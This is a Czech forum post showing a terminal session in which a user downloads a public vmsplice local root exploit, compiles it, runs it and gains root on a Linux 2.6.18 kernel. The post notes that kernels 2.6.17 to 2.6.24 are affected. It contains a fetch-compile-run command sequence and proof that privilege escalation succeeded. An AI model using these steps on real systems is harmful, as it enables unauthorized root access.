| xsoft   
  
 Admin
 
 
			| Založen: 25.07.2004 |  | Příspěvky: 4714 |  | Bydliště: Praha, Hostomice |    | 
	
		|  Zaslal: pá, 15.únor 2008, 14:51 |  |  |  |   	 	| jenda@yakumo:~$ uname -a Linux yakumo 2.6.18-5-486 #1 Mon Dec 24 16:04:42 UTC 2007 i586 GNU/Linux
 jenda@yakumo:~$ id
 uid=1000(jenda) gid=1000(jenda) skupiny=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(jenda)
 jenda@yakumo:~$ whoami
 jenda
 jenda@yakumo:~$ wget -nv http://www.securityfocus.com/data/vulnerabilities/exploits/27704.c
 13:13:30 URL:http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c [6264/6264] -> "27704.c" [1]
 jenda@yakumo:~$ gcc 27704.c
 jenda@yakumo:~$ ./a.out
 -----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
 -----------------------------------
 [+] mmap: 0x0 .. 0x1000
 [+] page: 0x0
 [+] page: 0x20
 [+] mmap: 0x4000 .. 0x5000
 [+] page: 0x4000
 [+] page: 0x4020
 [+] mmap: 0x1000 .. 0x2000
 [+] page: 0x1000
 [+] mmap: 0xb7da9000 .. 0xb7ddb000
 [+] root
 root@yakumo:~# id
 uid=0(root) gid=0(root) skupiny=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(jenda)
 root@yakumo:~# whoami
 root
 root@yakumo:~#
 
 | 
 
Celkem sranda ne?
 
Je na to kernel 2.6.17 - 2.6.24
http://jenda.blog.root.cz/0802/straslivy-exploit-na-2-6-17-2-6-24 
Na cem jeden ITTG2 AC? Na 2.6.12-rc3 ? | 
	|  |